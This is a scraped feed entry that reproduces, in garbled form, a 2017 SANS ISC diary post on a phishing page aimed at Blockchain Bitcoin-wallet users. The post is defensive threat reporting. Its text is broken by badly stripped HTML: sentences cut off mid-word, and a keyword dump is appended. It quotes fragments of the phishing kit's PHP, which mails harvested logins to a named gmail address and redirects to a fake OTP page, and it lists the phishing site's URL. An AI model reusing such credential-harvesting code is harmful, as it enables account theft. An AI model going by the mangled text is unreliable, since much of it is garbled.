One Article Review
| Source |  SANS Institute |
|---|---|
| Identifiant | 370772 |
| Date de publication | 2017-06-02 08:23:48 (vue: 2017-06-02 08:23:48) |
| Titre | Phishing Campaigns Follow Trends, (Fri, Jun 2nd) |
| Texte | Those phishing emails that we receive every day in our mailboxes are often related to key players in different fields: Internet actors Google, Yahoo!, Facebook, ... Software or manufacturers Apple, Microsoft, Adobe, ... Financial Services Paypal, BoA, name your preferred bank, ... Services DHL, eBay, ... But the landscape of online services is ever changing and new actors (and more precisely their customers) become new interesting targets. Yesterday, while hunting, I found for the first time aphishing page trying to lure the Bitcoinoperator: BlockChain. Blockchain[1] is a key player in the management of width:600px" /> Hopefully, the webshellisn padding:5px 10px"> $from = From: b hacker@forever.org\n $from .= MIME-Version: 1.0\r\n $from .= charset=ISO-8859-1\r\n if(@$_GET[accedi]==login){ mail(carlosromero19871@gmail.com header( Location: richiesta_otp.html }else{ Note that the login procedure on BlockChain is extremely strong: 2FA authentication and one-time link is sent via email to approve all login attempts. Be sure that activate them if youre a BlockChain customer. The fact that Bitcoins, the digital currency, is getting more and more popular makes it a new interesting target for attackers. And this is also the case in corporate environments: There is a trend in companies that make a reserve of Bitcoins to prevent possible Ransomware attacks![3] [1] https://www.blockchain.com [2]http://klimatika.com.ua/block/ [3]https://www.technologyreview.com/s/601643/companies-are-stockpiling-bitcoin-to-pay-off-cybercriminals/ Xavier Mertens (@xme) ISC Handler - Freelance Security Consultant PGP Key (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. |
| Envoyé | Oui |
| Condensat | $from 10px 2fa 2nd 8859 ==login @xme accedi activate actors adobe all also aphishing apple approve are attackers attacks attempts attribution authentication bank become bitcoin bitcoinoperator: bitcoins blockchain boa but campaigns carlosromero19871@gmail case center changing charset=iso com com/s/601643/companies commons companies consultant corporate creative currency customer customers cybercriminals/ day dhl different digital ebay edu else email emails environments: ever every extremely facebook fact fields: financial first follow found freelance fri from: get getting google hacker@forever handler header hopefully html http://klimatika https://isc https://www hunting interesting internet isc jun key landscape license link location: login lure mail mailboxes make makes management manufacturers mertens microsoft mime more name new noncommercial note off often one online org otp padding:5px page pay paypal pgp phishing player players popular possible precisely preferred prevent procedure ransomware receive related reserve richiesta sans security sent services software states stockpiling storm strong: sure target targets technologyreview them those time trend trends trying ua/block/ united version: webshellisn width:600px xavier yahoo yesterday your youre |
| Tags | |
| Stories | Yahoo |
| Notes | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.